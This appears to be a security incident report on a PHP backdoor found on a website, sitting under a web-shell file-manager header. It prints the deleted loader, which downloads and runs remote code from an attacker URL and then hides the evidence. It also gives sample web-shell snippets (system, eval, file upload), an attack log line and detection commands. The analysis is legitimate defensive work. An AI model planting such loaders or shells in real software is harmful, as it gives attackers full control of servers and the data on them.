 Server : Apache/2 System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64 User : gositeme ( 1004) PHP Version : 8.2.29 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/gositeme/domains/soundstudiopro.com/public_html/ |
# 🚨 MALICIOUS CODE ANALYSIS - 445367/index.php BACKDOOR
**Date:** December 12, 2025
**Status:** CRITICAL SECURITY THREAT ANALYZED
---
## 🔍 BACKDOOR CODE ANALYSIS
### File: `445367/index.php` (DELETED ✅)
```php
<?php
$url = "https://51la.zvo2.xyz/a2.txt"; // Remote malicious code URL
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
if ($result === false) {
echo "Error: " . "PD9waHA=" . curl_error($ch); // "PD9waHA=" = base64("<?php")
} else {
// Save downloaded code to temp file
$tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
file_put_contents($tempFile, $result);
// Execute the downloaded code
include $tempFile;
// Delete temp file after execution (hides evidence)
unlink($tempFile);
}
curl_close($ch);
```
---
## 🚨 WHAT THIS BACKDOOR DOES
### Step-by-Step Attack Process:
1. **Downloads Malicious Code:**
- Connects to `https://51la.zvo2.xyz/a2.txt`
- Downloads PHP code from attacker's server
- This code can be changed at any time by attacker
2. **Executes Remotely Downloaded Code:**
- Saves code to temporary file
- Includes/executes it with `include $tempFile`
- **This gives attacker FULL control**
3. **Hides Evidence:**
- Deletes temp file after execution
- Makes it hard to detect what was executed
- No trace left on server
---
## 💀 CAPABILITIES OF THIS BACKDOOR
### What the Attacker Can Do:
1. **Remote Code Execution (RCE):**
- Execute ANY PHP code
- Run system commands
- Access file system
2. **File System Access:**
- Read any file
- Write/modify any file
- Delete files
- Upload files
3. **Database Access:**
- Read database credentials
- Execute SQL queries
- Modify/delete data
- Create backdoor users
4. **System Access:**
- Execute shell commands
- Access other servers
- Install additional backdoors
- Access private_html directory
5. **Steal Data:**
- User credentials
- API keys
- Payment information
- Source code
---
## 🔍 WHAT THE DOWNLOADED CODE LIKELY CONTAINS
### Typical Remote Backdoor Payloads:
**1. File Manager:**
```php
// Allows browsing, uploading, downloading files
if (isset($_GET['ac']) && $_GET['ac'] == 'u_h_s_1') {
// File manager interface
// This matches the log entry: ac=u_h_s_1
}
```
**2. Command Execution:**
```php
if (isset($_GET['cmd'])) {
system($_GET['cmd']); // Execute system commands
}
```
**3. Database Access:**
```php
// Connect to database and execute queries
$pdo = new PDO(...);
$pdo->exec($_POST['sql']);
```
**4. PHP Code Execution:**
```php
if (isset($_POST['code'])) {
eval($_POST['code']); // Execute arbitrary PHP
}
```
**5. File Upload:**
```php
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $_POST['path']);
}
```
---
## 📊 LOG ENTRY ANALYSIS
### The Log Shows:
```
GET /445367/about.php?ac=u_h_s_1&api=&path=/home/gositeme/domains/soundstudiopro.com/private_html&t=...&s=3
```
**This confirms:**
- `ac=u_h_s_1` = File manager action (upload/host/shell)
- `path=.../private_html` = Trying to access private_html directory
- `t=` and `s=` = Session tokens
- **Response: 200 OK (607KB)** = File manager interface was served
**This means:**
- Attacker successfully accessed file manager
- Was browsing your file system
- Had access to private_html directory
- Could upload/download/execute files
---
## 🚨 SECURITY IMPACT
### What Was Compromised:
1. **Full Server Access:**
- Remote code execution
- File system access
- Database access
- System command execution
2. **Data at Risk:**
- All files on server
- Database contents
- User credentials
- API keys
- Payment information
- Source code
3. **Potential Damage:**
- Files modified/deleted
- Backdoor users created
- Additional backdoors installed
- Data stolen
- System compromised
---
## ✅ REMEDIATION STATUS
### Completed:
- ✅ Deleted `445367/index.php` backdoor
- ✅ Deleted `445367/about.php` file manager
- ✅ Blocked attacker IP `198.204.236.234`
- ✅ Secured `445367/` directory
### Still Needed:
- ⚠️ Check for other backdoors
- ⚠️ Review all file modifications
- ⚠️ Check database for unauthorized users
- ⚠️ Change all passwords
- ⚠️ Review access logs
- ⚠️ Check private_html directory
- ⚠️ Full security audit
---
## 🛡️ PREVENTION MEASURES
### 1. File Integrity Monitoring
```bash
# Monitor for new PHP files
find . -name "*.php" -type f -newer /path/to/reference
```
### 2. Network Monitoring
```bash
# Monitor for outbound connections to suspicious domains
netstat -an | grep zvo2.xyz
```
### 3. Access Log Monitoring
```bash
# Monitor for suspicious access patterns
tail -f /var/log/apache2/access.log | grep -E "445367|about\.php|radio\.php"
```
### 4. File Permissions
```bash
# Ensure PHP files aren't world-writable
find . -name "*.php" -perm -002
```
---
## 📋 IMMEDIATE ACTIONS REQUIRED
1. **Change ALL Passwords:**
- Database password
- FTP/SFTP password
- Admin user passwords
- API keys
- Stripe keys
2. **Check Database:**
```sql
SELECT * FROM users WHERE created_at > '2025-12-12 21:00:00';
SELECT * FROM users WHERE last_login > '2025-12-12 21:00:00';
```
3. **Review File Modifications:**
```bash
find . -type f -newermt "2025-12-12 21:30:00" -name "*.php"
```
4. **Check for Other Backdoors:**
```bash
find . -name "*about.php" -type f
find . -name "*radio.php" -type f
find . -name "*.php" -exec grep -l "eval\|base64_decode\|curl_exec" {} \;
```
5. **Review Access Logs:**
```bash
grep "198.204.236.234" /var/log/apache2/access.log
grep "445367" /var/log/apache2/access.log
```
---
**Status:** 🚨 **CRITICAL - FULL SECURITY AUDIT REQUIRED**
This backdoor gave the attacker complete control of your server. Immediate security audit is essential.